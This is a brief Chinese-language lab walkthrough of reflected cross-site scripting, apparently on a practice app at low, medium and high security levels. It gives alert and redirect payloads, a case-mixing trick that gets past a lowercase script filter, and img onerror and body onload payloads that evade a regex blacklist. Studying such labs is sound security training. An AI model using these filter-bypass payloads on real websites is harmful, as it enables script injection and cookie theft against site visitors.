XSS(反射性)
跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击;
XSS可以盗取客户端cookie,将客户端重定向到第三方网站;
一、low级别
一、判断是否有xss漏洞
输入 :北京
输入:<script>alert(/xxx/)</script>
弹框说明有xss漏洞
重定向 <script>window.location="http://www.baidu.com"</script>
获取cookie,等等,反射型XSS,可利用性不大。
二、medium级别
<script>alert(/xxxx/)</script>
没有反应,被过滤掉了
尝试大小写转换
<sCript>alert(/xxxx/)</scrIpt>
说明被过滤的是小写的script,存在XSS漏洞
三、high级别
<script>alert(/xxxx/)</script>
没有反应,被过滤掉了
尝试大小写转换
<sCript>alert(/xxxx/)</scrIpt>
没有反应,被过滤掉了
查看代码
High级别的代码同样使用黑名单过滤输入,preg_replace()函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效。
虽然无法使用<script>
标签注入XSS代码,但是可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。输入
<img src=1 onerror=alert(/xss/)>
<body onload=alert('XSS')>
等成功弹框: